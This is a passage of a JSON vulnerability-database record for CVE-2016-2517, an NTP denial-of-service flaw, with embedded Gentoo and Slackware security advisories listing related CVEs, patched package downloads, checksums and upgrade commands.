"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2517", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201604-608", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2016-2517", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2517" }, { "db": "JVNDB", "id": "JVNDB-2016-007713" }, { "db": "NVD", "id": "CVE-2016-2517" }, { "db": "CNNVD", "id": "CNNVD-201604-608" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP before 4.2.8p7 and 4.3.x before 4.3.92 allows remote attackers to cause a denial of service (prevent subsequent authentication) by leveraging knowledge of the controlkey or requestkey and sending a crafted packet to ntpd, which changes the value of trustedkey, controlkey, or requestkey. NOTE: this vulnerability exists because of a CVE-2016-2516 regression. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP There is a service disruption ( Interfering with subsequent authentication ) There are vulnerabilities that are put into a state. NTP is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. \nVersions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-15\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: NTP: Multiple vulnerabilities\n Date: July 20, 2016\n Bugs: #563774, #572452, #581528, #584954\n ID: 201607-15\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to Denial of Service. \n\nBackground\n==========\n\nNTP contains software for the Network Time Protocol. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8_p8 \u003e= 4.2.8_p8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-7691\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691\n[ 2 ] CVE-2015-7692\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692\n[ 3 ] CVE-2015-7701\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701\n[ 4 ] CVE-2015-7702\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702\n[ 5 ] CVE-2015-7703\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703\n[ 6 ] CVE-2015-7704\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704\n[ 7 ] CVE-2015-7705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705\n[ 8 ] CVE-2015-7848\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848\n[ 9 ] CVE-2015-7849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849\n[ 10 ] CVE-2015-7850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850\n[ 11 ] CVE-2015-7851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851\n[ 12 ] CVE-2015-7852\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852\n[ 13 ] CVE-2015-7853\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853\n[ 14 ] CVE-2015-7854\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854\n[ 15 ] CVE-2015-7855\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855\n[ 16 ] CVE-2015-7871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871\n[ 17 ] CVE-2015-7973\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973\n[ 18 ] CVE-2015-7974\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974\n[ 19 ] CVE-2015-7975\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975\n[ 20 ] CVE-2015-7976\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976\n[ 21 ] CVE-2015-7977\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977\n[ 22 ] CVE-2015-7978\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978\n[ 23 ] CVE-2015-7979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979\n[ 24 ] CVE-2015-8138\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138\n[ 25 ] CVE-2015-8139\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139\n[ 26 ] CVE-2015-8140\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140\n[ 27 ] CVE-2015-8158\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158\n[ 28 ] CVE-2016-1547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547\n[ 29 ] CVE-2016-1548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548\n[ 30 ] CVE-2016-1549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549\n[ 31 ] CVE-2016-1550\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550\n[ 32 ] CVE-2016-1551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551\n[ 33 ] CVE-2016-2516\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516\n[ 34 ] CVE-2016-2517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517\n[ 35 ] CVE-2016-2518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518\n[ 36 ] CVE-2016-2519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519\n[ 37 ] CVE-2016-4953\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953\n[ 38 ] CVE-2016-4954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954\n[ 39 ] CVE-2016-4955\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955\n[ 40 ] CVE-2016-4956\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956\n[ 41 ] CVE-2016-4957\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-15\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security] ntp (SSA:2016-120-01)\n\nNew ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz: Upgraded. \n This release patches several low and medium severity security issues:\n CVE-2016-1551: Refclock impersonation vulnerability, AKA: refclock-peering\n CVE-2016-1549: Sybil vulnerability: ephemeral association attack,\n AKA: ntp-sybil - MITIGATION ONLY\n CVE-2016-2516: Duplicate IPs on unconfig directives will cause an assertion\n botch\n CVE-2016-2517: Remote configuration trustedkey/requestkey values are not\n properly validated\n CVE-2016-2518: Crafted addpeer with hmode \u003e 7 causes array wraparound with\n MATCH_ASSOC\n CVE-2016-2519: ctl_getitem() return value not always checked\n CVE-2016-1547: Validate crypto-NAKs, AKA: nak-dos\n CVE-2016-1548: Interleave-pivot - MITIGATION ONLY\n CVE-2015-7704: KoD fix: peer associations were broken by the fix for\n NtpBug2901, AKA: Symmetric active/passive mode is broken\n CVE-2015-8138: Zero Origin Timestamp Bypass, AKA: Additional KoD Checks\n CVE-2016-1550: Improve NTP security against buffer comparison timing attacks,\n authdecrypt-timing, AKA: authdecrypt-timing\n For more information, see:\n http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p7-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p7-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p7-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p7-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p7-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p7-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n785dc2ef5f80edb28dc781e261c3fe3f ntp-4.2.8p7-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n899421096b7b63e6cb269f8b01dfd875 ntp-4.2.8p7-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ndfd34cbd31be3572a2bcae7f59cdfd91 ntp-4.2.8p7-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n63c4b31736040e7950361cd0d7081c8b ntp-4.2.8p7-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\ne760ae0c6cc3fa933e4d65d6995b0c84 ntp-4.2.8p7-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\naa448523b27bb4fcccc2f46cf4d72bc5 ntp-4.2.8p7-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n3bc7e54a4164a4f91be996b5cf2e643e ntp-4.2.8p7-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n0f6ea4dae476709f26f5d0e33378576c ntp-4.2.8p7-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\ndbe827ee7ece6ce5ca083cdd5960162c ntp-4.2.8p7-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n89f3edf183a6a9847d69b8349f98c901 ntp-4.2.8p7-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n4018b86edd15e40e8c5e9f50d907dcff n/ntp-4.2.8p7-i586-1.txz\n\nSlackware x86_64 -current package:\n7dd6b64ba8c9fdaebb7becc1f5c3963d n/ntp-4.2.8p7-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p7-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. |\n+------------------------------------------------------------------------+\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niEYEARECAAYFAlcjyyAACgkQakRjwEAQIjPtSgCdEB0YxCNSAabWZwD+ICyXcqeg\n3rIAnRLKXh7P6QXP2t+va4PM0crnd3l4\n=VO7T\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2016-2517" }, { "db": "CERT/CC", "id": "VU#718152" }, { "db": "JVNDB", "id": "JVNDB-2016-007713" }, { "db": "BID", "id": "88189" }, { "db": "VULMON", "id": "CVE-2016-2517" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "136864" } ], "trust": 2.88 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#718152", "trust": 3.6 }, { "db": "NVD", "id": "CVE-2016-2517", "trust": 3.0 }, { "db": "BID", "id": "88189", "trust": 2.0 }, { "db": "SECTRACK", "id": "1035705", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU91176422", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-007713", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201604-608", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2016-2517", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137992", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136864", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-2517" }, { "db": "BID", "id": "88189" }, { "db": "JVNDB", "id": "JVNDB-2016-007713" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "NVD", "id": "CVE-2016-2517" }, { "db": "CNNVD", "id": "CNNVD-201604-608" } ] }, "id": "VAR-201701-0398", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.33987721 }, "last_update_date": "2023-12-18T10:46:13.293000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "title": "NTP Bug 3010", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/ntpbug3010" }, { "title": "ntpd Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=61291" }, { "title": "Red Hat: CVE-2016-2517", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-2517" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2517" }, { "db": "JVNDB", "id": "JVNDB-2016-007713" }, { "db": "CNNVD", "id": "CNNVD-201604-608" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-007713" }, { "db": "NVD", "id": "CVE-2016-2517" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "https://www.kb.cert.org/vuls/id/718152" }, { "trust": 2.0, "url": "http://support.ntp.org/bin/view/main/ntpbug3010" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/88189" }, { "trust": 1.4, "url": "http://support.ntp.org/bin/view/main/securitynotice#april_2016_ntp_4_2_8p7_security" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201607-15" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1035705" }, { "trust": 1.1, "url": "https://security.netapp.com/advisory/ntap-20171004-0002/" }, { "trust": 1.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:16.ntp.asc" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2517" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#january_2016_ntp_4_2_8p6_securit" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu91176422/" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2517" }, { "trust": 0.3, "url": "http://www.ntp.org/" }, { "trust": 0.3, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160428-ntpd" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024073" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983803" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory7.asc" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8138" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7704" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1547" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/20.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2517" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1549" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7702" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7852" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7978" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7855" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7978" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7852" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2516" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7975" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7848" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7973" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7979" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4956" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7973" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7853" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7704" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7974" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4957" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7703" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7855" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4955" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7849" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7703" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1548" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1547" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7853" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7851" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7848" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1550" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8138" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7974" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4953" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7975" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7976" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7976" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2516" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7704" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1551" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1548" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2519" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2516" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2517" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2519" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1550" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1547" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8138" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2518" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1549" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1551" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1550" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2518" }, { "trust": 0.1, "url": "http://support.ntp.org/bin/view/main/securitynotice#recent_vulnerabilities" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1548" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1549" } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-2517" }, { "db": "BID", "id": "88189" }, { "db": "JVNDB", "id": "JVNDB-2016-007713" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "NVD", "id": "CVE-2016-2517" }, { "db": "CNNVD", "id": "CNNVD-201604-608" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-2517" }, { "db": "BID", "id": "88189" }, { "db": "JVNDB", "id": "JVNDB-2016-007713" }, { "db": 